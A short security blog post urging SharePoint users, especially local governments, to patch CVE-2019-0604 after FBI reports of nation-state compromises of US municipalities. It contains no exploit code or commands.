Sharepoint, Nation-State Cyberattacks, and You

Sharepoint, Nation-State Cyberattacks, and You

Last week I wrote about the threat that nation-state actors pose to enterprise organizations, and included a brief taxonomy of attackers.

This week, the FBI alerted cybersecurity folks of two compromises, likely by APT27, in 2019.

I’d like to highlight two interesting facts about the attacks.

First, they both exploited Sharepoint vulnerabilities, specifically the CVE-2019-0604 SharePoint vulnerability, which permits hackers to take over Sharepoint servers.

Some good technical writeups on the bug are here and here, and this writeup talks about good ways to detect and remediate if you’ve been hit.

So takeaway number 1: If you’re using Sharepoint, remediate now! Make sure you use the April patch, as apparently Microsoft issued three patches last year, with only the third and final version (April) being fully effective.

Takeaway number 2: The recorded attacks were on (unnamed) US municipalities, potentially putting the information of thousands of government workers at risk.

As the article I linked to says:

The FBI says that once attackers got a foothold on these networks, “malicious activities included exfiltration of user information, escalation of administrative privileges, and the dropping of webshells for remote/backdoor persistent access.”

People, this is a big freaking deal. If you haven’t remediated Sharepoint (with the April remediation), please do it now! And if you’re a municipality or local government, don’t assume you’re safe.

Share this post